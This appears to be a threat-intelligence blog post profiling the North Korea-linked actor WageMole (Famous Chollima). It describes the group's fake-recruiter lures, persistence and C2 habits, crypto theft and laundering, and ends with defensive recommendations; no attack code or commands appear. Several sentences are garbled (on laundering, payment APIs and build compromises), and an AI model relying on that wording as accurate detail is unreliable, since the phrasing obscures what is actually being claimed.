Introduction
WageMole, also known by aliases such as Nickel Tapestry, Storm-1877, UNC5267, Contagious Interview, and Famous Chollima, is a unique hybrid threat actor associated with the Democratic People’s Republic of Korea (DPRK). WageMole has been active since at least 2018, and this advanced persistent threat (APT) group, with sophisticated tactics, has combined state-directed intelligence collection with financially motivated cybercrime to fund North Korea’s sanctioned economy. In recent years, WageMole also has adapted its social-engineering campaigns, supply-chain attacks, and cryptocurrency theft to conduct operations that support its both financing and strategic objectives.
This blog explores WageMole’s origins, development, techniques, and significant campaigns from 2018 up to 2025 through case studies demonstrating how the group exemplifies the intersection of espionage and cybercrime, and the aspect of modern day statecraft.
Identity and Motivation
WageMole’s activities add up to the dual objectives of many DPRK cyber groups: raising revenue for the regime, and gathering intelligence on foreign technologies. The group primarily focuses on financial tech (fintech), cryptocurrency, and defense sectors for extraction of funds or theft of intellectual property. While other North Korean clusters operate solely to steal funds or gather intelligence, WageMole combines the two missions and may switch back and forth between the dual missions based on global opportunities.
The activities of the group align with North Korea’s strategic goal of achieving self-sufficiency in the face of economic sanctions. The proceeds from their campaigns are understood to be utilized directly in support of national weapons development programs or state-sponsored projects. The targets, tactics and timing of the group’s activity often overlaps with significant economic or political events related to North Korea’s regional adversaries.
Tactics, Techniques, and Procedures
WageMole utilizes a complicated blend of technical skills along with psychological manipulation to attack its victims. Their tactics evolve quickly, frequently combining legitimate tools with tailored malware to elude detection.
Initial Access
The group is well-known for their social-human engineering activities on social media sites such as LinkedIn. The attackers pose as recruiters for well-known tech or defense firms, contacting targets in engineering or development jobs. These engagements would typically result in a staged interview for a position where the victim would be asked to review malicious documents or undertake a test project with trojanized executables.
In addition to these types of social engineering schemes, WageMole has used exploits against vulnerable public-facing applications, remote desktop services, and third-party software suppliers. The group’s supply-chain approach is increasingly sophisticated, compromising software build environments to push out and install malware in all updates.
Execution and Persistence
After initial access is obtained, WageMole will drop custom loaders and backdoors that allow remote command execution. They frequently take advantage of PowerShell and Windows Management Instrumentation (WMI) to execute all actions while remaining undetected, and to maintain persistence within a system. Scheduled tasks and registry key persistence provide recovery methods to ensure continuous access to a compromised account.
WageMole also misuses legitimate remote administration tools such as AnyDesk, Atera, and ConnectWise Control. This dual-use tactic provides cover for blending in with the normal IT operation while keeping robust control channels intact.
Command and Control
The group’s command and control (C2) infrastructure is constructed to blend in with normal enterprise traffic. The group usually communicates over HTTPS or cloud services such as Amazon S3 and Google Cloud Storage. Domain fronting and content delivery networks also contribute to their traffic masquerading as daily web activity while organized crime is occurring.
Data Theft and Monetization
WageMole appears to focus primarily on stealing cryptocurrency wallets, exchange credentials, and blockchain API keys. Once stolen, the group needs to convert that currency back into fiat. To do this, the group launders or cyphers this currency through mixers, chain-hopping, and decentralized exchanges. In cases where the group utilizes coders through payment APIs, the group will disrupt payments and manipulate them to cash.
While profit is the primary motive, WageMole is also taking private software source code, encryption algorithms, and sensitive defense information. The reasoning behind this type of theft is probably for continued tech development facilitated by the DPRK, and intelligence reasons.
Notable Campaigns and Targets
Operation Contagious Interview (2022–2023)
This campaign exhibited harrowing fake recruiting efforts that targeted developers and security researchers in the cryptocurrency and fintech ecosystem. Victims were sent a job description and a coding test which delivered customized malware upon execution. The campaign demonstrated WageMole’s ability to masterclass social engineering, in that it was capable of tailoring operations for the professional context of the individuals it targeted.
Supply Chain Compromises (2024–2025)
Recent reporting from global cybersecurity firms indicates that WageMole has pivoted to compromising software providers to reach downstream customers. In some circumstances, the group endorsed build environments to insert malware maladies into trustworthy software updates. Such means of operations are characteristic of more advanced APT (Advanced Persistent Threat) activity; which illustrates an increasing technical prowess that is apparent in WageMole.
Cryptocurrency Heists (Ongoing)
Throughout 2024 and 2025, WageMole has carried out numerous heists against cryptocurrency exchanges in North America, Europe, and Asia. Through account credentials obtained via spear-phishing and social engineering, the group exfiltrated stolen digital assets worth millions of dollars. These operations continue to be one of the DPRK’s major sources of foreign currency.
Recent Developments
WageMole’s evolution reflects the trends seen in cyber operations from North Korea more broadly. This group has now incorporated artificial intelligence to improve the realism of their phishing and other content created by these medians. For example, AI-generated profiles, resumes, and interview information make it more difficult to differentiate from the defendable threats to legitimate attempts at recruitment.
WageMole is also continuing to develop its infrastructure management. They have begun to incorporate a modular framework to run throughout different delivery, command, and exfiltration stages on multiple independent servers and cloud regions. This will also increase the difficulty for attribution and acting on incidents.
CrowdStrike’s 2025 Global Threat Report uses the name of one of WageMole’s identified aliases, Famous Chollima, to describe it as an “enterprising adversary”. This identification shows a willingness to apply professionalism, an ability to quickly adapt, and an operational experience in aspects of private enterprise which differs from the usual shape of a group of hackers.
Strategic Impact
WageMole’s operations expose the blurred boundaries between state-sponsored espionage and financially motivated cybercrime. WageMole is an adaptable tool of North Korean cyber policy, operating support tactical revenue generation, while also longer-term intelligence objectives.
The group’s ability to engage in access activities inside recruitment processes and through the development pipeline exhibit their keen understanding of human vulnerabilities and technological vulnerabilities. They accomplish this by exploiting and leveraging trust within professional work environments to bypass perimeter defenses and conduct high-value compromises, all while bringing less technical exploitations.
WageMole’s global access also highlights the complexities of responding to DPRK cyber operations. Despite extensive international sanctions applied to North Korea, it is clear that DPRK continues to deploy technically-skilled teams that are capable of functioning across (and operating in) time zones. The DPRK operates in a resilient manner, using cloud-based infrastructure, anonymization tools, and cryptocurrency-based laundering networks allowing for operational resiliency and some level of financial independence.
Defensive Recommendations
Defending against WageMole requires user awareness, technical controls, and proactive threat hunting, in combination.
Implement Cloud and Network Visibility: Examine outbound encrypted traffic for unusual destinations and or recently registered domains.
Confirm Recruitment Engagements: Organizations should train employees on the dangers of unsolicited job offers. Recruiters should always utilize the company’s verified channels to communicate with employees and should never ask employees to install a package while on an interview, or click on links from outside sources.
Isolate Developer Environments: Continuous integration and delivery (CI/CD) systems should be isolated, monitored, and utilize multi-factor authentication (MFA). All software releases should be code-signed and checked for integrity.
Monitor for Anomalous Remote Tools: Implement monitoring for unusual AnyDesk, Atera, or VPN installations, especially on workstations in finance or development.
Conduct Behavioral Detection: Devices and tools that track lateral movement, PowerShell execution, or credential theft can signal the presence of WageMole, regardless of any signatures that may or may not be available for the malware.
Increase Supply Chain Monitoring: Regularly audit vendors and open-source dependencies to identify any tampering or malicious commits.
Conclusion
WageMole represents the next variant of North Korean cyber capacity: agile, adaptable, and entrepreneurial efforts. It is a state intelligence asset; it is, at the same time, a financial engine for a sanctioned regime. Its ability to weaponize professional trust and exploit national dependencies to digital networks illustrates the complexities of the contemporary cyber threat landscape.
As WageMole continues to evolve through 2025 and longer, institutions must invest attention to behavioral detection, credential protection, and human-based defense. Learning how this actor exploits social manipulation and technical precision is needed to anticipate and defend against the threats it poses to the global digital economy.
You can download and review the sheet for all the details!
